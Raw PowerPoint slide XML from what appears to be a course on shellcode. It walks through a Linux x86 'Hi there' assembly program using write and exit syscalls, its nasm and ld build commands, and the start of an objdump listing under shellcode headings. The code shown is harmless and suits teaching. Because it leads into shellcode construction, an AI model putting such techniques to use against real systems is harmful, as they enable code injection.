              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unsigned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int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len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1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/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>4			</a:t>
            </a:r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>
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>			</a:t>
            </a:r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>
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>			</a:t>
            </a:r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>
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> 0x80			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="140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CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t>, 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t>, 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH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3988" y="0"/>
            <a:ext cx="5545137" cy="917575"/>
          </a:xfrm>
        </p:spPr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: Assembler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>print</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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640632" y="1124744"/>
            <a:ext cx="7848872" cy="792088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38084" y="1988840"/>
            <a:ext cx="7848872" cy="4464496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1059" y="2000872"/>
            <a:ext cx="935897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8439216" y="1124744"/>
            <a:ext cx="105028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14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err="1" smtClean="0"/>
              <a:t>Syscalls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> are little functions provided by the kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be called by putting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> number in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and issuing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Arguments are in registers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47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 description of shellcode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is shellcode formed?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90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764704"/>
            <a:ext cx="8229600" cy="5616624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" b="1" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" b="1" dirty="0"/>
              <a:t> print.asm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF8400"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 'Hi there',0xa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>text</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unsigned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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1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/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>4			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> 0x80			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="140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CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t>, 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t>, 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH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3988" y="0"/>
            <a:ext cx="5545137" cy="917575"/>
          </a:xfrm>
        </p:spPr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94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Compile it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>-f elf print.asm </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Link it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t> –m elf_i386 -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>print.o</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Execute it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Hi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>there</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/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Shellcode?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00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592" y="1268413"/>
            <a:ext cx="8568952" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>print</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>08048080 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>&lt;_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt;: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// print</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> 8048080:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>b8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>04 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>$0x4,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> 8048085:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>01 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$0x1,%ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> 804808a:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>b9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>a4 90 04 08     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
